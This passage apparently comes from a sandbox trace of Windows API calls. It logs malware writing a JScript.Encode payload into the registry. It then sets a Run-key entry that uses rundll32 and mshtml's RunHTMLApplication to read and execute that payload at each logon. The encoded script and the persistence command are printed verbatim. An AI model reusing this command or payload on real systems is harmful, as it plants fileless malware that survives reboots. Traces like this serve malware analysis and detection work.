;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", cbData=0xef54 | out: lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f") returned 0x0 [0047.498] RegCloseKey (hKey=0xc8) returned 0x0 [0047.498] Sleep (dwMilliseconds=0x1388) [0052.500] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="software\\microsoft\\windows\\currentversion\\run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x44cf9dc, lpdwDisposition=0x0 | out: phkResult=0x44cf9dc*=0x214, lpdwDisposition=0x0) returned 0x0 [0052.500] NtSetValueKey (in: KeyHandle=0x214, ValueName="", TitleIndex=0x0, Type=0x1, Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")", DataSize=0x1d0 | out: Data="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"\\74script language=jscript.encode>\"+(new%20ActiveXObject(\"WScript.Shell\")).RegRead(\"HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run\\\\\")+\"\\74/script>\")") returned 0x0 [0052.500] RegSetValueExW (in: hKey=0x214, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" 